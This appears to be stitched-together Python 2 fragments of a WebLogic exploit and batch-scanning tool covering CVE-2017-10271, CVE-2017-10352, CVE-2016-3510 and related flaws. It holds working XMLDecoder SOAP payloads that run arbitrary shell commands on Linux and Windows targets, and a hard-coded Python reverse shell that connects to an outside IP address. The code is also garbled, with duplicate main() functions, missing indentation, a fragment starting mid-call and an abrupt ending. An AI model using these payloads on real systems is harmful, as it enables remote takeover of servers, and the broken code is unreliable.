def test():
urllist = utils.get_url_list(
"https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do?vulnerabilityID=030104"
)
for i in urllist:
print i + "--->" + str(cve_2016_3510(i))
def main():
parser = optparse.OptionParser()
parser.add_option('-H',
dest='tgtHost',
type="string",
help='specify target host')
parser.add_option('-p',
dest='tgtPort',
type='int',
help="specify target port")
parser.add_option(
'-b',
action="store_true",
dest='batch',
default=False,
help="do a batch scan obtaining url list from remote server")
parser.add_option('--time-based',
action="store_true",
dest='time_base',
help="time based",
default=False)
parser.add_option('-c', dest='command', help='command to execute')
parser.add_option('-f', dest='filepath', help='file to load')
parser.add_option('-O', dest='os', help='choose OS')
parser.add_option('--create-file',
action="store_true",
dest='create_file',
help="create file using native java",
default=False)
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPort = options.tgtPort
batch = options.batch
time_base = options.time_base
command = options.command
filepath = options.filepath
os = options.os
create_file = options.create_file
if batch and time_base and not tgtHost and not tgtPort and not command and not create_file:
urllist = utils.get_url_list(
"https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do"
)
if urllist:
target_host_port = map(utils.process_url, urllist)
pool = ThreadPool(50)
final_results_10271 = pool.map(cve_2017_10271_time_based,
target_host_port)
pool.close()
pool.join()
json_data_10271 = utils.assembly_data(
"030103", dict(zip(urllist, final_results_10271)))
print utils.post_data(
json_data_10271,
"https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do"
)
elif batch and tgtHost == None and tgtPort == None and not time_base and not command and not create_file:
urllist = utils.get_url_list(
"https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do"
)
#print urllist
assert 'https://' not in urllist
assert 'http://' not in urllist
assert 'http' not in urllist
assert 'https' not in urllist
if urllist:
target_url_list1 = map(
lambda url: 'http://' + utils.process_url(url)[0] + ":" + str(
utils.process_url(url)[1]) +
'/wls-wsat/CoordinatorPortType', urllist)
target_url_list2 = map(
lambda url: 'http://' + utils.process_url(url)[0] + ":" + str(
utils.process_url(url)[1]) +
'/wls-wsat/CoordinatorPortType11', urllist)
pool = ThreadPool(50)
results1_10271 = pool.map(cve_2017_10271, target_url_list1)
results2_10271 = pool.map(cve_2017_10271, target_url_list2)
results1_10352 = pool.map(cve_2017_10352, target_url_list1)
results2_10352 = pool.map(cve_2017_10352, target_url_list2)
pool.close()
pool.join()
final_results_10271 = [
x or y for x, y in zip(results1_10271, results2_10271)
]
json_data_10271 = utils.assembly_data(
"030103", dict(zip(urllist, final_results_10271)))
# if 'http://www.gzzwjw.gov.cn' in dict(zip(urllist, final_results_10271)):
# print dict(zip(urllist, final_results_10271))['http://www.gzzwjw.gov.cn']
final_results_10352 = [
x or y for x, y in zip(results1_10352, results2_10352)
]
json_data_10352 = utils.assembly_data(
"030111", dict(zip(urllist, final_results_10352)))
# print json_data_10271
# print json_data_10352
print utils.post_data(
json_data_10271,
"https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do"
)
print utils.post_data(
json_data_10352,
"https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do"
)
elif tgtHost and tgtPort and not batch and not time_base and not command and not create_file:
url1 = "http://" + tgtHost + ":" + str(
tgtPort) + '/wls-wsat/CoordinatorPortType'
url2 = "http://" + tgtHost + ":" + str(
tgtPort) + '/wls-wsat/CoordinatorPortType11'
cve_2017_10271(url1)
cve_2017_10271(url2)
cve_2017_10352(url1)
cve_2017_10352(url2)
elif tgtHost and tgtPort and time_base and not batch and not command and not create_file:
cve_2017_10271_time_based((tgtHost, tgtPort))
elif tgtHost and tgtPort and not time_base and not batch and not command and create_file:
url1 = "http://" + tgtHost + ":" + str(
tgtPort) + '/wls-wsat/CoordinatorPortType'
url2 = "http://" + tgtHost + ":" + str(
tgtPort) + '/wls-wsat/CoordinatorPortType11'
send_payload(url1, payload_create_file_10271, sig_10271,
"cve_2017_10271")
send_payload(url2, payload_create_file_10271, sig_10271,
"cve_2017_10271")
elif tgtHost and tgtPort and not time_base and not batch and command and os:
payload_linux_10271 = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>{}</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
payload_windows_10271 = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>C:\Windows\System32\cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>{}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
url1 = "http://" + tgtHost + ":" + str(
tgtPort) + '/wls-wsat/CoordinatorPortType'
url2 = "http://" + tgtHost + ":" + str(
tgtPort) + '/wls-wsat/CoordinatorPortType11'
if os == 'linux':
if command == 'shell':
command = '''
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("144.202.87.92",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
'''
# print payload_linux_10271
print payload_linux_10271.format(command)
send_payload(url1, payload_linux_10271.format(command), sig_10271,
"cve_2017_10271")
send_payload(url2, payload_linux_10271.format(command), sig_10271,
"cve_2017_10271")
elif os == 'win':
print payload_windows_10271.format(command)
send_payload(url1, payload_windows_10271.format(command),
sig_10271, "cve_2017_10271")
send_payload(url2, payload_windows_10271.format(command),
sig_10271, "cve_2017_10271")
elif not tgtHost and not tgtPort and filepath and not command and not batch and not time_base:
with open(filepath, 'r') as f:
u_list = f.readlines()
for i in u_list:
url = "http://" + i.strip() + '/wls-wsat/CoordinatorPortType'
# send_payload(url,payload_linux_10271, sig_10271, "cve_2017_10271")
cve_2017_10271(url)
cve_2017_10352(url)
else:
parser.print_help()
exit(0)
def main():
parser = optparse.OptionParser()
parser.add_option('-H',
dest='tgtHost',
type='string',
help='specify target host')
parser.add_option('-p',
dest='tgtPort',
type='string',
help='specify target port')
parser.add_option('-b',
dest='batch',
help='run a batch scan',
action="store_true",
default=False)
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPort = options.tgtPort
batch = options.batch
if batch and tgtHost == None and tgtPort == None:
# url = "http://192.168.10.216:7101"
urllist = utils.get_url_list(
"https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do"
)
# print urllist
if urllist:
pool = ThreadPool(100)
results_0638 = pool.map(cve_2016_0638, urllist)
results_3248 = pool.map(cve_2017_3248, urllist)
results_3510 = pool.map(cve_2016_3510, urllist)
results_2628 = pool.map(cve_2018_2628, urllist)
results_2893 = pool.map(cve_2018_2893, urllist)
pool.close()
pool.join()
json_0638 = utils.assembly_data("030108",
dict(zip(urllist, results_0638)))
json_3248 = utils.assembly_data("030101",
dict(zip(urllist, results_3248)))
json_3510 = utils.assembly_data("030106",
dict(zip(urllist, results_3510)))
json_2628 = utils.assembly_data("030113",
dict(zip(urllist, results_2628)))
json_2893 = utils.assembly_data("030114"), dict(
zip(urllist, results_2893))
print utils.post_data(
json_3510,
'https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do'
)
print utils.post_data(
json_0638,
'https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do'
)
print utils.post_data(
json_3248,
'https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do'
)
print utils.post_data(
json_2628,
'https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do'
)
print utils.post_data(
json_2893,
'https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do'
)
#print json_2628
# cve_2017_3248(url)
# cve_2016_3510(url)
# cve_2016_0638(url)
elif tgtHost and tgtPort and not batch:
url = 'http://' + tgtHost + ":" + tgtPort
cve_2016_3510(url)
cve_2016_0638(url)
cve_2017_3248(url)
cve_2018_2628(url)
cve_2018_2893(url)
else:
parser.print_help()
exit(0)
help="specify a ip target")
parser.add_argument('-b',
'--batch',
dest="batch",
default=False,
action="store_true",
help="batch scan")
args = parser.parse_args()
target = args.target
batch = args.batch
if target and not batch:
check(target)
elif batch and not target:
urllist = utils.get_url_list(
"http://192.168.17.89:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do"
)
if urllist:
pool = ThreadPool(20)
results = pool.map(check, urllist)
# print dict(zip(urllist,results))
json_data = utils.assembly_data("060102",
dict(zip(urllist, results)))
r = utils.post_data(
json_data,
"http://192.168.17.89:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do"
)
print "Uploading data to remote server, please wait..."
# time.sleep(2)
if r: